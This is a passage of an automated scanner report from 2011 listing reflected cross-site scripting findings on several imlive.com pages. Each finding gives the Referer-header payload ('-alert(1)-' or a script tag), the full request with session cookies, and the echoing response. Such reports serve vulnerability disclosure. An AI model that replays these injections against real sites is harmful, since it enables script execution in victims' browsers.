Path:   /become_host.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6689'-alert(1)-'b778a8b9f7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /become_host.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f6689'-alert(1)-'b778a8b9f7a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:31 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=f6689'-alert(1)-'b778a8b9f7a&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.194. http://imlive.com/becomehost.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98226'-alert(1)-'ff8df7e9357 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /becomehost.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:01 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=98226'-alert(1)-'ff8df7e9357&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.195. http://imlive.com/categoryfs.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b27c2'><script>alert(1)</script>5c3f838203 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b27c2'><script>alert(1)</script>5c3f838203

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8327
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=b27c2'><script>alert(1)</script>5c3f838203&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.196. http://imlive.com/categoryfs.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4ad1'><script>alert(1)</script>5d132d65cec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:01 GMT
Connection: close
Content-Length: 19002
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232&lr=1107816009&ud=0&pe=categoryfs.asp&rf=http://www.google.com/search?hl=en^q=c4ad1'><script>alert(1)</script>5d132d65cec&qs=cat=232&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.197. http://imlive.com/categoryms.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aec77'><script>alert(1)</script>01882fe6e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=aec77'><script>alert(1)</script>01882fe6e1e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:02 GMT
Connection: close
Content-Length: 21894
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2&lr=1107816009&ud=0&pe=categoryms.asp&rf=http://www.google.com/search?hl=en^q=aec77'><script>alert(1)</script>01882fe6e1e&qs=cat=2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.198. http://imlive.com/categoryms.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69bb4'><script>alert(1)</script>8751657e5a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=69bb4'><script>alert(1)</script>8751657e5a8

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8328
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=69bb4'><script>alert(1)</script>8751657e5a8&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.199. http://imlive.com/customerservice.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /customerservice.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5eb49'><script>alert(1)</script>a0a4a130032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /customerservice.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=5eb49'><script>alert(1)</script>a0a4a130032

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:15 GMT
Connection: close
Content-Length: 14451
Vary: Accept-Encoding


<HTML>
   <HEAD>
       <title>Customer Service - Live Video Chat at ImLive</title>
       <meta name="description" content="You are very important to us, and we strive to provide you with world class custom
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/help/guide/guide.asp&lr=1107816009&ud=0&pe=help/guide/guide.asp&rf=http://www.google.com/search?hl=en^q=5eb49'><script>alert(1)</script>a0a4a130032&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.200. http://imlive.com/disclaimer.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /disclaimer.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d32e'><script>alert(1)</script>90577f18320 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /disclaimer.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=3d32e'><script>alert(1)</script>90577f18320

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:51 GMT
Connection: close
Content-Length: 78924
Vary: Accept-Encoding


<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp&lr=1107816009&ud=0&pe=disclaimer.asp&rf=http://www.google.com/search?hl=en^q=3d32e'><script>alert(1)</script>90577f18320&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.201. http://imlive.com/forgot.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1365d'-alert(1)-'8c7ad16a976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

